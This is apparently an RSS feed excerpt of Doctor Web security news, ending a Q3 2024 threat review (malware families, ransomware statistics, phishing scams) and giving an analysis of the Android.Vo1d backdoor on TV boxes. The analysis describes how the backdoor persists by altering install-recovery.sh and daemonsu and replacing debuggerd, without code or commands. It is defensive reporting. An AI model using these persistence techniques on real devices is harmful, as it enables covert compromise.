      &lt;dd&gt;A family of malicious JavaScripts that inject a malicious script into the HTML code of webpages.&lt;/dd&gt;
    
    &lt;dt&gt;&lt;b&gt;LNK.Starter.56&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;The detection name for a shortcut that is crafted in a specific way. This shortcut is distributed through removable media, like USB flash drives. To mislead users and conceal its activities, it has a default icon of a disk. When launched, it executes malicious VBS scripts from a hidden directory located on the same drive as the shortcut itself.&lt;/dd&gt;
    
    &lt;dt&gt;&lt;b&gt;W97M.DownLoader.6154&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;A family of downloader trojans that exploit vulnerabilities in Microsoft Office documents. They can also download other malicious programs to a compromised computer.&lt;/dd&gt;
    
    &lt;dt&gt;&lt;b&gt;Trojan.AutoIt.1410&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;The detection name for packed versions of the &lt;a href="https://vms.drweb.com/search/?q=Trojan.AutoIt.289&amp;lng=en"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; malicious app that are written in the AutoIt scripting language. This trojan is distributed as part of a group of several malicious applications, including a miner, a backdoor, and a self-propagating module. &lt;a href="https://vms.drweb.com/search/?q=Trojan.AutoIt.289&amp;lng=en"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; performs various malicious actions that make it difficult for the main payload to be detected.&lt;/dd&gt;  
  &lt;/dl&gt;
&lt;/section&gt;


&lt;section class="margTM margBM" id="encryptor"&gt;
  &lt;h2 class="alignCenter"&gt;Encryption ransomware&lt;/h2&gt;
  &lt;p&gt;In Q3 2024, the number of requests made to decrypt files affected by encoder trojans decreased by 15.73%, compared to Q2 2024.&lt;/p&gt;
  &lt;p&gt;The dynamics of the requests Doctor Web’s technical service received to decrypt files affected by encoder trojans:&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_common/03_encoder_requests_q3_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_common/03_encoder_requests_q3_2024_en.1.png" alt="Encryption ransomware"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;p&gt;The most common encoders of Q3 2024:&lt;/p&gt;
  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; — 19.38%&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.Encoder.3953&amp;lng=en"&gt;&lt;b&gt;Trojan.Encoder.3953&lt;/b&gt;&lt;/a&gt; — 9.42%&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.Encoder.38200&amp;lng=en"&gt;&lt;b&gt;Trojan.Encoder.38200&lt;/b&gt;&lt;/a&gt; — 3.99%&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.Encoder.26996&amp;lng=en"&gt;&lt;b&gt;Trojan.Encoder.26996&lt;/b&gt;&lt;/a&gt; — 2.89%&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.35067&lt;/b&gt; — 2.72%&lt;/dt&gt;
  &lt;/dl&gt;
&lt;/section&gt;


&lt;section class="margTM margBM" id="dangerous"&gt;
  &lt;h2 class="alignCenter"&gt;Network fraud&lt;/h2&gt;
  &lt;p&gt;During Q3 2024, Internet scammers continued distributing spam emails containing links leading to various fraudulent sites. Russian-speaking users, for example, again dealt with messages that were supposedly sent on behalf of well-known online stores. Some of these mails offered users the ability to participate in prize draws or get a gift. After clicking on the links in such emails, potential victims were directed to fraudulent sites where they were asked to pay a commission to “receive” their gift or their winnings.&lt;/p&gt;
  
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_common/04_fake_store_q3_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_common/04_fake_store_q3_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Scammers, allegedly on behalf of an online store, offer their potential victim the chance to “receive their winnings” of 208,760 rubles&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;In other emails, users were supposedly given a discount that could be used to purchase goods in a large electronics store. The links from such messages led to a fake website designed in the style of the genuine store’s site. When potential victims placed an “order” on this fake Internet resource, they had to provide their personal data and bank card information.&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_common/05_fake_store_q3_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_common/05_fake_store_q3_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;A fraudulent email that lets recipients “activate a promo code” for buying electronics&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;Finance-themed spam remains popular among fraudsters. For instance, threat actors were sending unwanted emails for users to “confirm” their receipt of large money transfers. An example of one such mail targeting English-speaking users is shown below. It contained a link that led to the phishing login form of an online bank that outwardly resembled the form on the real bank’s website.&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_common/06_fake_bank_q3_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_common/06_fake_bank_q3_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;The user supposedly needs to confirm receipt of US $1,218.16&lt;/em&gt;&lt;/p&gt;

  &lt;div class="margTM column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_common/07_fake_bank_q3_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_common/07_fake_bank_q3_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;A phishing site that fraudsters pass off as a genuine bank website&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;Among the unwanted emails targeting Japanese users, our experts detected yet more fake bank notifications—for example, ones that supposedly contained the previous month’s bank card statement. In one of these messages, the scammers camouflaged the link to the phishing site. In the text of the letter, users saw links to the real addresses of the bank’s website, but when they clicked on them, they were taken to a fraudulent Internet resource.&lt;/p&gt;
  
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_common/08_ja_spam_q3_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_common/08_ja_spam_q3_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;All the links in this email actually lead to a phishing website&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;French-speaking users (from Belgium, in particular) encountered phishing emails informing them that their bank accounts were “blocked”. To get them “unblocked”, they were asked to follow a link that actually led to the fraudsters’ website.&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_common/09_fake_bank_q3_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_common/09_fake_bank_q3_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Scammers scare potential victims with a “blocked” bank account message&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;And among Russian users, email spam, sent presumably on behalf of famous banks and offering investor opportunities, was once again actively being distributed. The links in such unwanted emails lead to fraudulent sites where visitors, under the pretense of accessing investing services, are asked to provide personal data.&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_common/10_fake_bank_q3_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_common/10_fake_bank_q3_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;The user, allegedly on behalf of the bank, is being offered the chance to complete a test and become an investor&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;At the same time, Doctor Web’s Internet analysts detected new phishing websites targeting cryptocurrency owners. On one of them, for example, visitors were informed, supposedly on behalf of a large cryptocurrency exchange, about an undelivered Bitcoin transfer. To “complete” the transaction, potential victims were asked to pay a “commission”. Naturally, no cryptocurrency was ever received by the users—all they did was give their own assets to the scammers.&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_common/11_fake_crypto_q3_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_common/11_fake_crypto_q3_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;This fraudulent site informs users about a supposedly unreceived Bitcoin transfer&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;In addition, websites were detected that imitated the look of the VKontakte Russian social network. Visitors to these fake sites were offered the chance to participate in some prize drawing, for which they needed to open several virtual gift boxes. After the potential victims opened the “correct” boxes and allegedly won a large amount of money, the site proposed that they pay a “fee” to receive their “winnings”.&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_common/12_fake_social_q3_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_common/12_fake_social_q3_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;A fraudulent site offering visitors the opportunity to “try their luck”&lt;/em&gt;&lt;/p&gt;

  &lt;div class="margTM column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_common/13_fake_social_q3_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_common/13_fake_social_q3_2024.1.png" alt="Network fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;This user has supposedly won a prize of 194,562 rubles&lt;/em&gt;&lt;/p&gt;

  &lt;div class="CellBlock dangerous_urls_new alignCenter"&gt;
    &lt;a href="https://antifraud.drweb.com/dangerous_urls/?lng=en" target="_blank" rel="noopener noreferrer" class="fontM font2X white textShadow"&gt;Find out more about Dr.Web non-recommended sites&lt;/a&gt;
  &lt;/div&gt;  
&lt;/section&gt;


&lt;section class="margTM margBM" id="formobile"&gt;
  &lt;h2 class="alignCenter"&gt;Malicious and unwanted programs for mobile devices&lt;/h2&gt;
  &lt;p&gt;According to detection statistics collected by Dr.Web Security Space for mobile devices, in Q3 2024, &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; malicious apps, which threat actors use in various fraudulent schemes, were most often detected on protected devices. The second most common were adware trojans from the &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; family. These were followed by &lt;b&gt;Android.Siggen&lt;/b&gt; trojans.&lt;/p&gt;
  &lt;p&gt;Over the past observation period, our specialists discovered many new threats on Google Play. Among them were different trojan variants from the &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; and &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; families. Moreover, an attack on Android TV box sets was detected, with the &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; backdoor infecting about 1.3 million devices from users in 197 countries. It placed its component in the system storage area and, when commanded by threat actors, could covertly download and install third-party software. Additionally, banking trojans &lt;b&gt;Android.SmsSpy.888.origin&lt;/b&gt; and &lt;b&gt;Android.SmsSpy.11629&lt;/b&gt; were found that targeted Indonesian users.&lt;/p&gt;
  &lt;p&gt;The following Q3 2024 events involving mobile malware are the most noteworthy:&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;The discovery of the &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; backdoor, which infected over a million TV box sets,&lt;/li&gt;
    &lt;li&gt;High activity on the part of &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; malicious apps,&lt;/li&gt;
    &lt;li&gt;High activity on the part of &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; ad-displaying trojans,&lt;/li&gt;
    &lt;li&gt;The emergence of new threats on Google Play.&lt;/li&gt;
  &lt;/ul&gt;

  &lt;p&gt;To find out more about the security-threat landscape for mobile devices in Q3 2024, read our &lt;a href="https://news.drweb.com/show/review/?i=14912&amp;lng=en" target="_blank" rel="noopener noreferrer"&gt;special overview&lt;/a&gt;.&lt;/p&gt;

&lt;/section&gt;

&lt;style&gt;
    .custom-color-link a {
        color: #73b320;
    }
&lt;/style&gt;
</description></item><item><guid>https://news.drweb.com/show/?i=14900&amp;lng=en</guid><title>Void captures over a million Android TV boxes</title><link>https://news.drweb.com/show/?i=14900&amp;lng=en&amp;c=9</link><pubDate>Thu, 12 Sep 2024 02:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;September 12, 2024&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Doctor Web experts have uncovered yet another case of an Android-based TV box infection. The malware, dubbed &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt;, has infected nearly 1.3 million devices belonging to users in 197 countries. It is a backdoor that puts its components in the system storage area and, when commanded by attackers, is capable of secretly downloading and installing third-party software.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;In August 2024, Doctor Web was contacted by several users whose Dr.Web antivirus had detected changes in their device’s system file area. The problem occurred with these models:&lt;/p&gt;

&lt;table class="Table"&gt;
    &lt;thead&gt;
      &lt;tr&gt;
        &lt;th&gt;TV box model&lt;/th&gt;
        &lt;th&gt;Declared firmware version&lt;/th&gt;
      &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
      &lt;tr&gt;
        &lt;td&gt;R4&lt;/td&gt;
        &lt;td&gt;Android 7.1.2; R4 Build/NHG47K&lt;/td&gt;
      &lt;/tr&gt;
      &lt;tr&gt;
        &lt;td&gt;TV BOX&lt;/td&gt;
        &lt;td&gt;Android 12.1; TV BOX Build/NHG47K&lt;/td&gt;
      &lt;/tr&gt;
      &lt;tr&gt;
        &lt;td&gt;KJ-SMART4KVIP&lt;/td&gt;
        &lt;td&gt;Android 10.1; KJ-SMART4KVIP Build/NHG47K&lt;/td&gt;
      &lt;/tr&gt;
    &lt;/tbody&gt;
&lt;/table&gt;

&lt;p&gt;All these cases involved similar signs of infection, so we will describe them using one of the first requests we received as an example. The following objects were changed on the affected TV box:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;span class="string"&gt;install-recovery.sh&lt;/span&gt;&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;daemonsu&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;In addition, 4 new files emerged in its file system:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;span class="string"&gt;/system/xbin/vo1d&lt;/span&gt;&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;/system/xbin/wd&lt;/span&gt;&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;/system/bin/debuggerd&lt;/span&gt;&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;/system/bin/debuggerd_real&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The &lt;span class="string"&gt;vo1d&lt;/span&gt; and &lt;span class="string"&gt;wd&lt;/span&gt; files are the components of the &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; trojan that we discovered.&lt;/p&gt;

&lt;blockquote&gt;
  The trojan’s authors probably tried to disguise one if its components as the system program /system/bin/vold, having called it by the similar-looking name “vo1d” (substituting the lowercase letter “l” with the number “1”). The malicious program’s name comes from the name of this file. Moreover, this spelling is consonant with the English word “void”.
&lt;/blockquote&gt;

&lt;p&gt;The &lt;span class="string"&gt;install-recovery.sh&lt;/span&gt; file is a script that is present on most Android devices. It runs when the operating system is launched and contains data for autorunning the elements specified in it. If any malware has root access and the ability to write to the &lt;span class="string"&gt;/system&lt;/span&gt; system directory, it can anchor itself in the infected device by adding itself to this script (or by creating it from scratch if it is not present in the system). &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; has registered the autostart for the &lt;span class="string"&gt;wd&lt;/span&gt; component in this file.&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/01_recovery.png" class="preview alignCenter"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/01_recovery.png" alt="The modified install-recovery.sh file"&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;The modified install-recovery.sh file&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The &lt;span class="string"&gt;daemonsu&lt;/span&gt; file is present on many Android devices with root access. It is launched by the operating system when it starts and is responsible for providing root privileges to the user. &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; registered itself in this file, too, having also set up autostart for the &lt;span class="string"&gt;wd&lt;/span&gt; module.&lt;/p&gt;

&lt;p&gt;The &lt;span class="string"&gt;debuggerd&lt;/span&gt; file is a daemon that is typically used to create reports on occurred errors. But when the TV box was infected, this file was replaced by the script that launches the &lt;span class="string"&gt;wd&lt;/span&gt; component.&lt;/p&gt;

&lt;p&gt;The &lt;span class="string"&gt;debuggerd_real&lt;/span&gt; file in the case we are reviewing is a copy of the script that was used to substitute the real &lt;span class="string"&gt;debuggerd&lt;/span&gt; file. Doctor Web experts believe that the trojan’s authors intended the original &lt;span class="string"&gt;debuggerd&lt;/span&gt; to be moved into &lt;span class="string"&gt;debuggerd_real&lt;/span&gt; to maintain its functionality. However, because the infection probably occurred twice, the trojan moved the already substituted file (i.e., the script). As a result, the device had two scripts from the trojan and not a single real &lt;span class="string"&gt;debuggerd&lt;/span&gt; program file.&lt;/p&gt;

&lt;p&gt;At the same time, other users who contacted us had a slightly different list of files on their infected devices:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;span class="string"&gt;daemonsu&lt;/span&gt; (the &lt;span class="string"&gt;vo1d&lt;/span&gt; file analogue — &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d.1&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d.1&lt;/b&gt;&lt;/a&gt;);&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;wd&lt;/span&gt; (&lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d.3&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d.3&lt;/b&gt;&lt;/a&gt;);&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;debuggerd&lt;/span&gt; (the same script as described above);&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;debuggerd_real&lt;/span&gt; (the original file of the &lt;span class="string"&gt;debuggerd&lt;/span&gt; tool);&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;install-recovery.sh&lt;/span&gt; (a script that loads objects specified in it).  &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;An analysis of all the aforementioned files showed that in order to anchor &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d in the&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d in the&lt;/b&gt;&lt;/a&gt; system, its authors used at least three different methods: modification of the &lt;span class="string"&gt;install-recovery.sh&lt;/span&gt; and &lt;span class="string"&gt;daemonsu&lt;/span&gt; files and substitution of the &lt;span class="string"&gt;debuggerd&lt;/span&gt; program. They probably expected that at least one of the target files would be present in the infected system, since manipulating even one of them would ensure the trojan’s successful auto launch during subsequent device reboots. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt;’s main functionality is concealed in its &lt;span class="string"&gt;vo1d&lt;/span&gt; (&lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d.1&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d.1&lt;/b&gt;&lt;/a&gt;) and &lt;span class="string"&gt;wd&lt;/span&gt; (&lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d.3&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d.3&lt;/b&gt;&lt;/a&gt;) components, which operate in tandem. The &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d.1&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d.1&lt;/b&gt;&lt;/a&gt; module is responsible for &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d.3&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d.3&lt;/b&gt;&lt;/a&gt;’s launch and controls its activity, restarting its process if necessary. In addition, it can download and run executables when commanded to do so by the C&amp;C server. In turn, the &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d.3&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d.3&lt;/b&gt;&lt;/a&gt; module installs and launches the &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d.5&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d.5&lt;/b&gt;&lt;/a&gt; daemon that is encrypted and stored in its body. This module can also download and run executables. Moreover, it monitors specified directories and installs the APK files that it finds in them.&lt;/p&gt;

&lt;p&gt;A study conducted by Doctor Web malware analysts showed that the &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; backdoor has infected around 1.3 million devices, while its geographical distribution included almost 200 countries. The largest number of infections were detected in Brazil, Morocco, Pakistan, Saudi Arabia, Russia, Argentina, Ecuador, Tunisia, Malaysia, Algeria, and Indonesia.&lt;/p&gt;

&lt;p class="alignCenter"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/02_Android.Vo1d_map_en.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/02_Android.Vo1d_map_en.png" alt="Countries with the highest number of infected devices detected" style="width:75%;"&gt;
  &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Countries with the highest number of infected devices detected&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;One possible reason why the attackers distributing &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; specifically chose TV boxes is that such devices often run on outdated Android versions, which have unpatched vulnerabilities and are no longer supported with updates. For example, the users who contacted us have models that are based on Android 7.1, despite the fact that for some of them the configuration indicates much newer versions, such as Android 10 and Android 12. Unfortunately, it is not uncommon for budget device manufacturers to utilize older OS versions and pass them off as more up-to-date ones to make them more attractive.&lt;/p&gt;

&lt;p&gt;In addition, users themselves may mistakenly perceive TV boxes to be better protected devices, compared to smartphones. As a result, they may install anti-virus software on these less often and risk encountering malware when downloading third-party apps or installing unofficial firmware. &lt;/p&gt;

&lt;p&gt;At the moment, the source of the TV boxes’ backdoor infection remains unknown. One possible infection vector could be an attack by an intermediate malware that exploits operating system vulnerabilities to gain root privileges. Another possible vector could be the use of unofficial firmware versions with built-in root access.&lt;/p&gt;

&lt;p&gt;Dr.Web anti-virus for Android successfully detects all known &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; trojan variants, and, if root access is available, cures the infected devices.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Android.Vo1d/README.adoc" target="_blank" rel="noopener noreferrer"&gt;Indicators of compromise&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;More details on &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d.1&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d.1&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;More details on &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d.3&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d.3&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;More details on &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d.5&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d.5&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;</description></item></channel></rss>
